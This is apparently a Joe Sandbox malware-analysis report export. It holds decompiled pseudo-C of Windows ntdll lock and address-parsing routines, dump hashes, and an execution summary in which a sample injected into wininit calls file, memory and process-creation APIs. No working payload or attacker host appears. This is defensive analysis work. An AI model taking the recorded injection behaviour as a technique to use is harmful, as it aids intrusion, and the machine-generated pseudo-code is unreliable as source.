                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E00875384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E0084F970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E00893915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E00893915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E00893915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L38;
                                                													}
                                                													E00875329(_t74, _t92);
                                                													_push(1);
                                                													_t48 = E008753A5(_t92);
                                                													return _t48;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L38;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L38:
                                                			}

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B22F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008B22FC
                                                • RTL: Re-Waiting, xrefs: 008B2328
                                                • RTL: Resource at %p, xrefs: 008B230B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                • Instruction ID: 600517cdec4b725ecc61dbbeadc4832de0abeb51c93c90ce8a4aa3d4cbc10385
                                                • Opcode Fuzzy Hash: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                • Instruction Fuzzy Hash: 28512671600A056BEF11AB68CC81FA677D8FF59364F104229FD08DB395EAA5EC4187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E0087EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				signed int _v24;
                                                				intOrPtr* _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				short _v66;
                                                				char _v72;
                                                				void* __esi;
                                                				intOrPtr _t38;
                                                				intOrPtr _t39;
                                                				signed int _t40;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t53;
                                                				signed char _t67;
                                                				void* _t72;
                                                				intOrPtr _t77;
                                                				intOrPtr* _t80;
                                                				intOrPtr _t84;
                                                				intOrPtr* _t85;
                                                				void* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_t80 = __edi;
                                                				_t75 = __edx;
                                                				_t70 = __ecx;
                                                				_t84 = _a4;
                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                					E0086DA92(__ecx, __edx, __eflags, _t84);
                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                				}
                                                				_push(0);
                                                				__eflags = _t38 - 0xffffffff;
                                                				if(_t38 == 0xffffffff) {
                                                					_t39 =  *0x93793c; // 0x0
                                                					_push(0);
                                                					_push(_t84);
                                                					_t40 = E008516C0(_t39);
                                                				} else {
                                                					_t40 = E0084F9D4(_t38);
                                                				}
                                                				_pop(_t85);
                                                				__eflags = _t40;
                                                				if(__eflags < 0) {
                                                					_push(_t40);
                                                					E00893915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                					asm("int3");
                                                					while(1) {
                                                						L21:
                                                						_t76 =  *[fs:0x18];
                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                							_v66 = 0x1722;
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_t76 =  &_v72;
                                                							_push( &_v72);
                                                							_v28 = _t85;
                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(0x10);
                                                							_push(0x20402);
                                                							E008501A4( *0x7ffe0382 & 0x000000ff);
                                                						}
                                                						while(1) {
                                                							_t43 = _v8;
                                                							_push(_t80);
                                                							_push(0);
                                                							__eflags = _t43 - 0xffffffff;
                                                							if(_t43 == 0xffffffff) {
                                                								_t71 =  *0x93793c; // 0x0
                                                								_push(_t85);
                                                								_t44 = L00851F28(_t71);
                                                							} else {
                                                								_t44 = E0084F8CC(_t43);
                                                							}
                                                							__eflags = _t44 - 0x102;
                                                							if(_t44 != 0x102) {
                                                								__eflags = _t44;
                                                								if(__eflags < 0) {
                                                									_push(_t44);
                                                									E00893915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                									asm("int3");
                                                									E008D2306(_t85);
                                                									__eflags = _t67 & 0x00000002;
                                                									if((_t67 & 0x00000002) != 0) {
                                                										_t7 = _t67 + 2; // 0x4
                                                										_t72 = _t7;
                                                										asm("lock cmpxchg [edi], ecx");
                                                										__eflags = _t67 - _t67;
                                                										if(_t67 == _t67) {
                                                											E0087EC56(_t72, _t76, _t80, _t85);
                                                										}
                                                									}
                                                									return 0;
                                                								} else {
                                                									__eflags = _v24;
                                                									if(_v24 != 0) {
                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                									}
                                                									return 2;
                                                								}
                                                								goto L36;
                                                							}
                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                							_push(_t67);
                                                							_t46 = L00894FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                							_push(_t77);
                                                							L008A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                							_t48 =  *_t85;
                                                							_t92 = _t91 + 0x18;
                                                							__eflags = _t48 - 0xffffffff;
                                                							if(_t48 == 0xffffffff) {
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                							}
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(_t49);
                                                							_t50 = _v12;
                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                							_push(_t85);
                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                							L008A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                							_t53 =  *_t85;
                                                							_t93 = _t92 + 0x20;
                                                							_t67 = _t67 + 1;
                                                							__eflags = _t53 - 0xffffffff;
                                                							if(_t53 != 0xffffffff) {
                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                							}
                                                							__eflags = _t67 - 2;
                                                							if(_t67 > 2) {
                                                								__eflags = _t85 - 0x9320c0;
                                                								if(_t85 != 0x9320c0) {
                                                									_t76 = _a4;
                                                									__eflags = _a4 - _a8;
                                                									if(__eflags == 0) {
                                                										E008D217A(_t71, __eflags, _t85);
                                                									}
                                                								}
                                                							}
                                                							_push("RTL: Re-Waiting\n");
                                                							_push(0);
                                                							_push(0x65);
                                                							_a8 = _a4;
                                                							L008A3F92();
                                                							_t91 = _t93 + 0xc;
                                                							__eflags =  *0x7ffe0382;
                                                							if( *0x7ffe0382 != 0) {
                                                								goto L21;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                				} else {
                                                					return _t40;
                                                				}
                                                				L36:
                                                			}

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008B248D
                                                • RTL: Re-Waiting, xrefs: 008B24FA
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008B24BD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
• Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                • Instruction ID: 0dc2bc009b5d2f1ac6e333faad7182d170ef8b86663718ee7fd7a4c7d0a7552d
                                                • Opcode Fuzzy Hash: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                • Instruction Fuzzy Hash: 6641E870600204ABDB20DFA8DC85FAA7BA8FF49320F208645F559DB7D1D734E9418B66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0088FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t105;
                                                				void* _t110;
                                                				char _t114;
                                                				short _t115;
                                                				void* _t118;
                                                				signed short* _t119;
                                                				short _t120;
                                                				char _t122;
                                                				void* _t127;
                                                				void* _t130;
                                                				signed int _t136;
                                                				intOrPtr _t143;
                                                				signed int _t158;
                                                				signed short* _t164;
                                                				signed int _t167;
                                                				void* _t170;
                                                
                                                				_t158 = 0;
                                                				_t164 = _a4;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_t136 = 0;
                                                				while(1) {
                                                					_t167 =  *_t164 & 0x0000ffff;
                                                					if(_t167 == _t158) {
                                                						break;
                                                					}
                                                					_t118 = _v20 - _t158;
                                                					if(_t118 == 0) {
                                                						if(_t167 == 0x3a) {
                                                							if(_v12 > _t158 || _v8 > _t158) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									break;
                                                								}
                                                								_t143 = 2;
                                                								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                								_v28 = 1;
                                                								_v8 = _t143;
                                                								_t136 = _t136 + 1;
                                                								L47:
                                                								_t164 = _t119;
                                                								_v20 = _t143;
                                                								L14:
                                                								if(_v24 == _t158) {
                                                									L19:
                                                									_t164 =  &(_t164[1]);
                                                									_t158 = 0;
                                                									continue;
                                                								}
                                                								if(_v12 == _t158) {
                                                									if(_v16 > 4) {
                                                										L29:
                                                										return 0xc000000d;
                                                									}
                                                									_t120 = L0088EE02(_v24, _t158, 0x10);
                                                									_t170 = _t170 + 0xc;
                                                									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                									_t136 = _t136 + 1;
                                                									goto L19;
                                                								}
                                                								if(_v16 > 3) {
                                                									goto L29;
                                                								}
                                                								_t122 = L0088EE02(_v24, _t158, 0xa);
                                                								_t170 = _t170 + 0xc;
                                                								if(_t122 > 0xff) {
                                                									goto L29;
                                                								}
                                                								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                								goto L19;
                                                							}
                                                						}
                                                						L21:
                                                						if(_v8 > 7 || _t167 >= 0x80) {
                                                							break;
                                                						} else {
                                                							if(E0088685D(_t167, 4) == 0) {
                                                								if(E0088685D(_t167, 0x80) != 0) {
                                                									if(_v12 > 0) {
                                                										break;
                                                									}
                                                									_t127 = 1;
                                                									_a7 = 1;
                                                									_v24 = _t164;
                                                									_v20 = 1;
                                                									_v16 = 1;
                                                									L36:
                                                									if(_v20 == _t127) {
                                                										goto L19;
                                                									}
                                                									_t158 = 0;
                                                									goto L14;
                                                								}
                                                								break;
                                                							}
                                                							_a7 = 0;
                                                							_v24 = _t164;
                                                							_v20 = 1;
                                                							_v16 = 1;
                                                							goto L19;
                                                						}
                                                					}
                                                					_t130 = _t118 - 1;
                                                					if(_t130 != 0) {
                                                						if(_t130 == 1) {
                                                							goto L21;
                                                						}
                                                						_t127 = 1;
                                                						goto L36;
                                                					}
                                                					if(_t167 >= 0x80) {
                                                						L7:
                                                						if(_t167 == 0x3a) {
                                                							_t158 = 0;
                                                							if(_v12 > 0 || _v8 > 6) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									_v8 = _v8 + 1;
                                                									L13:
                                                									_v20 = _t158;
                                                									goto L14;
                                                								}
                                                								if(_v28 != 0) {
                                                									break;
                                                								}
                                                								_v28 = _v8 + 1;
                                                								_t143 = 2;
                                                								_v8 = _v8 + _t143;
                                                								goto L47;
                                                							}
                                                						}
                                                						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                							break;
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							_t158 = 0;
                                                							goto L13;
                                                						}
                                                					}
                                                					if(E0088685D(_t167, 4) != 0) {
                                                						_v16 = _v16 + 1;
                                                						goto L19;
                                                					}
                                                					if(E0088685D(_t167, 0x80) != 0) {
                                                						_v16 = _v16 + 1;
                                                						if(_v12 > 0) {
                                                							break;
                                                						}
                                                						_a7 = 1;
                                                						goto L19;
                                                					}
                                                					goto L7;
                                                				}
                                                				 *_a8 = _t164;
                                                				if(_v12 != 0) {
                                                					if(_v12 != 3) {
                                                						goto L29;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				if(_v28 != 0 || _v8 == 7) {
                                                					if(_v20 != 1) {
                                                						if(_v20 != 2) {
                                                							goto L29;
                                                						}
                                                						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                						L65:
                                                						_t105 = _v28;
                                                						if(_t105 != 0) {
                                                							_t98 = (_t105 - _v8) * 2; // 0x11
                                                							E00868980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                							_t110 = 8;
                                                							L0085DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_v12 != 0) {
                                                						if(_v16 > 3) {
                                                							goto L29;
                                                						}
                                                						_t114 = L0088EE02(_v24, 0, 0xa);
                                                						_t170 = _t170 + 0xc;
                                                						if(_t114 > 0xff) {
                                                							goto L29;
                                                						}
                                                						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                						goto L65;
                                                					}
                                                					if(_v16 > 4) {
                                                						goto L29;
                                                					}
                                                					_t115 = L0088EE02(_v24, 0, 0x10);
                                                					_t170 = _t170 + 0xc;
                                                					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                					goto L65;
                                                				} else {
                                                					goto L29;
                                                				}
                                                			}
                                                0x0088fd6e
                                                0x0088fd71
                                                0x00000000
                                                0x0088fd71
                                                0x0088fd4a
                                                0x0088fd21
                                                0x0089a3a1
                                                0x00000000
                                                0x0089a3a1
                                                0x0088fd36
                                                0x008a200b
                                                0x008a2012
                                                0x00000000
                                                0x00000000
                                                0x008a2018
                                                0x00000000
                                                0x008a2018
                                                0x00000000
                                                0x0088fd36
                                                0x0088fe0f
                                                0x0088fe16
                                                0x0089a3ad
                                                0x00000000
                                                0x00000000
                                                0x0089a3b3
                                                0x0089a3b3
                                                0x0088fe1f
                                                0x008bed25
                                                0x008bed86
                                                0x00000000
                                                0x00000000
                                                0x008bed91
                                                0x008bed95
                                                0x008bed95
                                                0x008bed9a
                                                0x008bedad
                                                0x008bedb3
                                                0x008bedba
                                                0x008bedc4
                                                0x008bedc9
                                                0x00000000
                                                0x008bedcc
                                                0x008bed2a
                                                0x008bed55
                                                0x00000000
                                                0x00000000
                                                0x008bed61
                                                0x008bed66
                                                0x008bed6e
                                                0x00000000
                                                0x00000000
                                                0x008bed7d
                                                0x00000000
                                                0x008bed7d
                                                0x008bed30
                                                0x00000000
                                                0x00000000
                                                0x008bed3c
                                                0x008bed43
                                                0x008bed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: cfac600704774685271467b141e37622a5a52eab989a4f9751c855e79601add1
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 15915B31D0020AEFDF24EF98C8456EEB7B4FF95314F24807AD611EA263E7705A558B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage: 2.5%
                                                Dynamic/Decrypted Code Coverage: 1.7%
                                                Signature Coverage: 0%
                                                Total number of Nodes: 693
                                                Total number of Limit Nodes: 92

                                                Graph

                                                [Execution graph edge list spilled from the rendered graph (node ids 65103 to 65959 with call-site addresses in the 0xe3d70 to 0xfb380 range and 0x251f900 to 0x25207ac thunks); the graph image is not preserved in this text export. API nodes named in the graph: LdrInitializeThunk, LdrLoadDll, NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, SetErrorMode, CreateProcessInternalW, CreateThread, PostThreadMessageW, Sleep]

                                                Executed Functions

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 261 f85da-f8631 call f91e0 NtCreateFile
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,000F3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000F3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000F862D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: be12d34cabbb28e97c4079e3512672dcec8cf5e5b17e8b82af740d5cb265c7c5
                                                • Instruction ID: bc74ebc2c1a53e40483537335b362215b5de44ab357e5a4ee797b379223ad704
                                                • Opcode Fuzzy Hash: be12d34cabbb28e97c4079e3512672dcec8cf5e5b17e8b82af740d5cb265c7c5
                                                • Instruction Fuzzy Hash: 8801B2B6200108AFDB08DF88DC95EEB77A9FF8C354F158259FA0D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 264 f85e0-f85f6 265 f85fc-f8631 NtCreateFile 264->265 266 f85f7 call f91e0 264->266 266->265
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,000F3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000F3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000F862D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: c77310d449c0be41e1d1e580a5741785b1b37c36f7a1ead8f91ee8e80c9b441a
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: BBF0BDB2204208ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(000F3D72,5E972F65,FFFFFFFF,000F3A31,?,?,000F3D72,?,000F3A31,FFFFFFFF,5E972F65,000F3D72,?,00000000), ref: 000F86D5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 7ee59263f502b6ebdb51afa4532fc48ab2403b67a60900eab42f30424adeaa3a
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 30F0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158258BE1D97241D630E911CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000E2D11,00002000,00003000,00000004), ref: 000F87F9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 0b3e7a1c7995605b3abb60cf7925e9896edff0d9f77f5d7994a2ae4ae766ef43
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 3FF015B2200208ABCB14DF89CC81EEB77ADAF88750F118158FE0897241C630F910CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(000F3D50,?,?,000F3D50,00000000,FFFFFFFF), ref: 000F8735
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: a59e846a552b7266872e8c27b175aa604b740f6f37a1c62ab40dab2bb698f618
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: 28D012752002146BD710EB98CC45FE7775CEF44750F154455BA185B242C530F600C6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(000F3D50,?,?,000F3D50,00000000,FFFFFFFF), ref: 000F8735
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: b39f3d5f1e6191cbd2ad9c44986a4f7a019309b22d5d8090dbe028a3430b0010
                                                • Instruction ID: 52e3640c33b021f095d447090f9020c348f1b38f203da1a1bf768c618c1633db
                                                • Opcode Fuzzy Hash: b39f3d5f1e6191cbd2ad9c44986a4f7a019309b22d5d8090dbe028a3430b0010
                                                • Instruction Fuzzy Hash: FAD02B7D40D3C04FD715FB74A8C10DBBF40EE825247145E9EE8E407543C260E215EB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
